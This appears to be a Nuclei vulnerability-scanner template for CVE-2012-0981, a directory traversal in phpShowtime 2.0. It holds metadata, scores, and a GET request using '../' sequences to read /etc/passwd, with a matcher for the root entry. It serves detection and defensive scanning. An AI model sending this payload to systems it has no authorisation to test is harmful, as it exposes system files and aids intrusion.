nuclei-templates/http/cves/2012/CVE-2012-0981.yaml

43 lines
1.5 KiB
YAML

id: CVE-2012-0981
info:
name: phpShowtime 2.0 - Directory Traversal
author: daffainfo
severity: medium
description: A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php.
remediation: |
Upgrade to a patched version of phpShowtime or apply the necessary security patches to fix the directory traversal vulnerability.
reference:
- https://www.exploit-db.com/exploits/18435
- https://nvd.nist.gov/vuln/detail/CVE-2012-0981
- http://www.exploit-db.com/exploits/18435
- https://exchange.xforce.ibmcloud.com/vulnerabilities/72824
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2012-0981
cwe-id: CWE-22
epss-score: 0.02053
epss-percentile: 0.87761
cpe: cpe:2.3:a:kybernetika:phpshowtime:2.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: kybernetika
product: phpshowtime
tags: phpshowtime,edb,cve,cve2012,lfi,kybernetika
http:
- method: GET
path:
- "{{BaseURL}}/index.php?r=i/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4b0a0048304602210096935d615f52f39f003fd899f9cb1d7be9b48c9c882ff733f686d82ba34ddae7022100f939341b22db34d1feb5098038d1eb5b1cef6b52ee242b97077c38b00e179dbc:922c64590222798bb761d5b6d8e72950